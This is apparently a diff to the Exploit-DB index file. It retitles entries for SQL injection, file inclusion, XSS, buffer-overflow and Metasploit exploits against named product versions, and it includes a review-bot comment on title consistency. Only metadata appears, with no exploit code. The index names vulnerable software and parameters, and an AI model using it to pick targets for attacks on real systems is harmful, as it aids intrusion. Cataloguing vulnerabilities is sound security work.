 28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0
 28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser Parameter) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0
-28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0
+28410,platforms/php/webapps/28410.txt,"Mambo Component 'com_admin-copy_module' - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0
 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0
 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0
 28413,platforms/php/webapps/28413.txt,"cPanel 10.x - dohtaccess.html dir Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0
 28414,platforms/php/webapps/28414.txt,"cPanel 10.x - editit.html file Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0
 28415,platforms/php/webapps/28415.txt,"cPanel 10.x - showfile.html file Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0
-28416,platforms/php/webapps/28416.txt,"Mambo EstateAgent 1.0.2 Component - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0
+28416,platforms/php/webapps/28416.txt,"Mambo Component EstateAgent 1.0.2 - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0
 28417,platforms/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x - TCMS_Administer Parameter Remote File Inclusion",2006-08-21,You_You,php,webapps,0
 28418,platforms/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0
 28419,platforms/php/webapps/28419.txt,"DieselScripts Smart Traffic - 'index.php' Remote File Inclusion",2006-08-21,night_warrior771,php,webapps,0
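Review bot: The rewritten title for 28416 leaves `MosConfig_absolute_path` bare, while 28404 and 28410 in this same hunk were changed to `'MosConfig_absolute_path' Parameter`. Someone searching the index for the quoted parameter form would find two of the three Mambo entries here and not the third. For consistency the description could read `"Mambo Component EstateAgent 1.0.2 - 'MosConfig_absolute_path' Parameter Remote File Inclusion"`. The same style gap appears for 28818 in the `@@ -25920` hunk, where `HTMLTemplate.php` stays unquoted although 28396 now quotes `'Reporter.sql.php'`.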
@@ -25550,7 +25550,7 @@ id,file,description,date,author,platform,type,port
 28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - download.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
 28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - admin.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
 28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0
-28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component Com_comprofiler 1.0 - class.php Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0
+28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0
 28438,platforms/windows/remote/28438.html,"Microsoft Internet Explorer 5.0.1 - Daxctle.OCX Spline Method Heap Buffer Overflow",2006-08-28,XSec,windows,remote,0
 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0
 28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusion",2006-08-29,sCORPINo,php,webapps,0
@@ -25671,7 +25671,7 @@ id,file,description,date,author,platform,type,port
 28660,platforms/php/webapps/28660.php,"CPanel 5-10 - SUID Wrapper Privilege Escalation",2006-09-24,"Nima Salehi",php,webapps,0
 28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps,0
 28561,platforms/multiple/dos/28561.pl,"Blast XPlayer - Local Buffer Overflow (PoC)",2013-09-26,flux77,multiple,dos,0
-28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard 2620 Switch Series. Edit Admin Account - Cross-Site Request Forgery",2013-09-26,"Hubert Gradek",hardware,webapps,0
+28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard (HP) 2620 Switch Series. Edit Admin Account - Cross-Site Request Forgery",2013-09-26,"Hubert Gradek",hardware,webapps,0
 28563,platforms/multiple/webapps/28563.txt,"Posnic Stock Management System 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0
 28564,platforms/php/webapps/28564.txt,"ArticleSetup - Multiple Vulnerabilities",2013-09-26,DevilScreaM,php,webapps,0
 38990,platforms/php/webapps/38990.txt,"ArticleSetup Article Script 1.00 - SQL Injection",2015-12-15,"Linux Zone Research Team",php,webapps,80
@@ -25920,7 +25920,7 @@ id,file,description,date,author,platform,type,port
 28815,platforms/php/webapps/28815.txt,"H-Sphere Webshell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,php,webapps,0
 28816,platforms/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling Denial of Service",2006-10-16,nnp,linux,dos,0
 28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 - ZWDeleteFile Function Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",multiple,local,0
-28818,platforms/php/webapps/28818.txt,"Mambo MostlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps,0
+28818,platforms/php/webapps/28818.txt,"Mambo Module MOStlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps,0
 28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 - Calcul-page.php Remote File Inclusion",2006-10-17,The_BeKiR,php,webapps,0
 28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 - 'index.php' Cross-Site Scripting",2006-10-17,Lostmon,php,webapps,0
 28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 - Example6.php Remote File Inclusion",2006-10-16,ERNE,php,webapps,0
@@ -26991,7 +26991,7 @@ id,file,description,date,author,platform,type,port
 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0
 29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.asp SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0
 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0
-29819,platforms/windows/dos/29819.c,"Irfanview 3.99 - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0
+29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple .BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0
 29820,platforms/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",multiple,remote,0
 29821,platforms/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0
 29822,platforms/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local,0
@@ -27233,7 +27233,7 @@ id,file,description,date,author,platform,type,port
 30224,platforms/windows/dos/30224.py,"Ingress Database Server 2.6 - Multiple Remote Vulnerabilities",2007-06-21,anonymous,windows,dos,0
 30225,platforms/php/webapps/30225.txt,"eNdonesia 8.4 - mod.php viewarticle Action artid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0
 30226,platforms/php/webapps/30226.txt,"eNdonesia 8.4 - banners.php click Action bid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0
-30227,platforms/php/webapps/30227.txt,"Joomla! / Mambo Component Mod_Forum - PHPBB_Root.php Remote File Inclusion",2007-06-22,spymeta,php,webapps,0
+30227,platforms/php/webapps/30227.txt,"Joomla! / Mambo Component Mod_Forum - 'PHPBB_Root.php' Remote File Inclusion",2007-06-22,spymeta,php,webapps,0
 30228,platforms/osx/remote/30228.txt,"Apple WebCore - XMLHTTPRequest Cross-Site Scripting",2007-06-22,"Richard Moore",osx,remote,0
 30229,platforms/multiple/remote/30229.txt,"SHTTPD 1.38 - Filename Parse Error Information Disclosure",2007-06-25,"Shay Priel",multiple,remote,0
 30230,platforms/php/webapps/30230.txt,"MyNews 0.10 - AuthACC SQL Injection",2007-06-25,netVigilance,php,webapps,0
@@ -28027,9 +28027,9 @@ id,file,description,date,author,platform,type,port
 31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 - pref.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
 31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 - search.php adv Parameter Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
 31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 - 'report_type' Cross-Site Scripting",2008-01-26,nnposter,php,webapps,0
-31066,platforms/php/webapps/31066.txt,"Mambo MOStlyCE 2.4 Module - 'connector.php' Cross-Site Scripting",2008-01-28,"AmnPardaz ",php,webapps,0
+31066,platforms/php/webapps/31066.txt,"Mambo Module MOStlyCE 2.4 - 'connector.php' Cross-Site Scripting",2008-01-28,"AmnPardaz ",php,webapps,0
 31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Inclusion",2008-01-28,p4imi0,php,webapps,0
-31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility - Arbitrary File Upload",2008-01-28,"AmnPardaz ",php,webapps,0
+31068,platforms/php/webapps/31068.txt,"Mambo Module MOStlyCE 2.4 Image Manager Utility - Arbitrary File Upload",2008-01-28,"AmnPardaz ",php,webapps,0
 31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 - 'index.php' Cross-Site Scripting",2008-01-28,jekil,php,webapps,0
 40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
 31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page - SQL Injection",2008-01-28,T_L_O_T_D,asp,webapps,0
@@ -28085,7 +28085,7 @@ id,file,description,date,author,platform,type,port
 31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 - 'subpage' Parameter Multiple Local File Inclusion",2008-02-08,"Alexandr Polyakov",php,webapps,0
 31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 - 'id' Parameter Cross-Site Scripting",2008-02-08,Psiczn,php,webapps,0
 31125,platforms/php/webapps/31125.txt,"Joovili 2.1 - 'members_help.php' Remote File Inclusion",2008-02-08,Cr@zy_King,php,webapps,0
-31126,platforms/php/webapps/31126.txt,"Serendipity Freetag-plugin 2.95 - 'style' Parameter Cross-Site Scripting",2008-02-08,"Alexander Brachmann",php,webapps,0
+31126,platforms/php/webapps/31126.txt,"S9Y Serendipity Freetag-plugin 2.95 - 'style' Parameter Cross-Site Scripting",2008-02-08,"Alexander Brachmann",php,webapps,0
 31127,platforms/linux/remote/31127.txt,"Mozilla Firefox 2.0.9 - 'view-source:' Scheme Information Disclosure",2008-02-08,"Ronald van den Heetkamp",linux,remote,0
 31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - HTTP POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0
 31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x - Installation Information Disclosure",2008-02-08,"Brook Powers",php,webapps,0
@@ -28136,8 +28136,8 @@ id,file,description,date,author,platform,type,port
 31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0
 31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0
 31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80
-31174,platforms/php/webapps/31174.txt,"Joomla! Extension Komento 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80
-31175,platforms/php/webapps/31175.txt,"Joomla! Extension JV Comment 3.0.2 - (index.php id Parameter) SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80
+31174,platforms/php/webapps/31174.txt,"Joomla! Component 'com_komento' 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80
+31175,platforms/php/webapps/31175.txt,"Joomla! Component 'com_jvcomment' 3.0.2 - 'id' Parameter SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80
 31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
 31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
 31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
@@ -28175,15 +28175,15 @@ id,file,description,date,author,platform,type,port
 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
 31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component com_smslist - 'listid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
 31207,platforms/php/webapps/31207.txt,"Joomla! / Mambo Component com_activities - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
-31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
+31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
 31209,platforms/php/webapps/31209.txt,"Joomla! / Mambo Component faq - 'catid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
 31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11 - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
 31211,platforms/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 - 'index.php' SQL Injection",2008-02-15,S@BUN,php,webapps,0
 31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
-31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
+31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
 31214,platforms/php/webapps/31214.txt,"Joomla! / Mambo Component com_lexikon - 'id' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
-31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component com_filebase - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
-31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
+31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
+31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
 31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,php,webapps,0
 31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0
 32241,platforms/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,php,webapps,0
@@ -28197,9 +28197,9 @@ id,file,description,date,author,platform,type,port
 31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Cross-Site Request Forgery (via Persistent Cross-Site Scripting) (Password Reset)",2014-01-27,"David Um",windows,webapps,0
 31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,windows,dos,0
 31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0
-31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
+31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component 'com_profile' - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0
-31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component com_detail - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
+31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component 'com_detail' - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
 31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0
 31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
 31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0
@@ -28228,8 +28228,8 @@ id,file,description,date,author,platform,type,port
 31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
 31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
 31253,platforms/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Remote Exploit",2014-01-29,Mekanismen,jsp,remote,80
-31254,platforms/windows/remote/31254.py,"PCMan FTP Server 2.07 - ABOR Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
-31255,platforms/windows/remote/31255.py,"PCMan FTP Server 2.07 - CWD Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
+31254,platforms/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
+31255,platforms/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
 31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80
 31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection",2008-03-04,"Aria-Security Team",php,webapps,0
 31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'Filename' Parameter Local File Inclusion",2008-03-04,The-0utl4w,php,webapps,0
@@ -28391,7 +28391,7 @@ id,file,description,date,author,platform,type,port
 31432,platforms/linux/remote/31432.rb,"Skybluecanvas CMS - Remote Code Execution (Metasploit)",2014-02-05,Metasploit,linux,remote,0
 31433,platforms/multiple/remote/31433.rb,"Apache Tomcat Manager - Application Upload Authenticated Code Execution (Metasploit)",2014-02-05,Metasploit,multiple,remote,80
 31434,platforms/java/remote/31434.rb,"Apache Struts - Developer Mode OGNL Execution (Metasploit)",2014-02-05,Metasploit,java,remote,8080
-31435,platforms/php/webapps/31435.py,"Joomla! Component JomSocial 2.6 - Code Execution",2014-02-05,"Matias Fontanini",php,webapps,80
+31435,platforms/php/webapps/31435.py,"Joomla! Component 'com_community' 2.6 - Code Execution",2014-02-05,"Matias Fontanini",php,webapps,80
 31436,platforms/php/webapps/31436.txt,"Pandora Fms 5.0RC1 - Remote Command Injection",2014-02-05,xistence,php,webapps,80
 31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0
 31439,platforms/php/webapps/31439.txt,"cPanel 11.18.3 - List Directories and Folders Information Disclosure",2008-03-18,Linux_Drox,php,webapps,0
@@ -28403,7 +28403,7 @@ id,file,description,date,author,platform,type,port
 31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - 'manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0
 31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp' dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0
 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0
-31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0
+31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component 'com_datsogallery' 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0
 31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
 31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
 31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
@@ -28464,7 +28464,7 @@ id,file,description,date,author,platform,type,port
 31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 - include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
 31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 - style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
 31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - (geo_zones.php zID Parameter) SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80
-31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80
+31516,platforms/php/webapps/31516.txt,"S9Y Serendipity 1.7.5 - (Backend) Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80
 31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 / 3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",php,webapps,80
 31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution (Metasploit)",2014-02-07,Metasploit,linux,remote,8023
 31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,hardware,remote,0
@@ -28539,7 +28539,7 @@ id,file,description,date,author,platform,type,port
 31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service",2008-04-02,"The Hacker Webzine",windows,dos,0
 31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection",2008-04-02,"The Hacker Webzine",windows,dos,0
 31594,platforms/linux/dos/31594.html,"Opera Web Browser 9.26 - Multiple Security Vulnerabilities",2008-04-03,"Michal Zalewski",linux,dos,0
-31595,platforms/php/webapps/31595.txt,"Joomla! / Mambo Component Joomlaearn Lms - 'cat' Parameter SQL Injection",2008-04-03,The-0utl4w,php,webapps,0
+31595,platforms/php/webapps/31595.txt,"Joomla! / Mambo Component 'com_lms' - 'cat' Parameter SQL Injection",2008-04-03,The-0utl4w,php,webapps,0
 31596,platforms/php/webapps/31596.txt,"mcGallery 1.1 - admin.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0
 31597,platforms/php/webapps/31597.txt,"mcGallery 1.1 - 'index.php' lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0
 31598,platforms/php/webapps/31598.txt,"mcGallery 1.1 - sess.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0
@@ -29655,7 +29655,7 @@ id,file,description,date,author,platform,type,port
 32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Parameter Remote File Inclusion",2009-02-20,Kacper,php,webapps,0
 32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure",2009-02-20,"Clément Lecigne",linux,local,0
 32806,platforms/php/webapps/32806.txt,"Blue Utopia - 'index.php' Local File Inclusion",2009-02-22,PLATEN,php,webapps,0
-32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0
+32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component 'com_gigcal' 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0
 32808,platforms/php/webapps/32808.txt,"Magento 1.2 - app/code/core/Mage/Admin/Model/Session.php login['Username'] Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0
 32809,platforms/php/webapps/32809.txt,"Magento 1.2 - app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0
 32810,platforms/php/webapps/32810.txt,"Magento 1.2 - downloader/index.php URL Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0
@@ -30795,7 +30795,7 @@ id,file,description,date,author,platform,type,port
 34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0
 34114,platforms/php/webapps/34114.txt,"Joomla! Component Jreservation - Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0
 34086,platforms/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443
-34087,platforms/php/webapps/34087.txt,"Joomla! Component YouTube Gallery - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80
+34087,platforms/php/webapps/34087.txt,"Joomla! Component 'com_youtubegallery' - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80
 34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0
 34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat - 'r' Parameter Cross-Site Scripting",2010-06-14,Sid3^effects,php,webapps,0
 34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti - Insecure Cookie Authentication Bypass",2010-06-02,Septemb0x,php,webapps,0
@@ -31192,7 +31192,7 @@ id,file,description,date,author,platform,type,port
 34523,platforms/multiple/remote/34523.txt,"Nagios XI - 'users.php' SQL Injection",2010-08-24,"Adam Baldwin",multiple,remote,0
 34524,platforms/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80
 34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0
-34637,platforms/php/webapps/34637.txt,"Joomla! Component Spider Form Maker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",php,webapps,0
+34637,platforms/php/webapps/34637.txt,"Joomla! Component 'com_formmaker' 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",php,webapps,0
 34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution",2010-08-25,storm,windows,remote,0
 34684,platforms/php/webapps/34684.pl,"Joomla! Component Spain - 'nv' Parameter SQL Injection",2010-09-20,FL0RiX,php,webapps,0
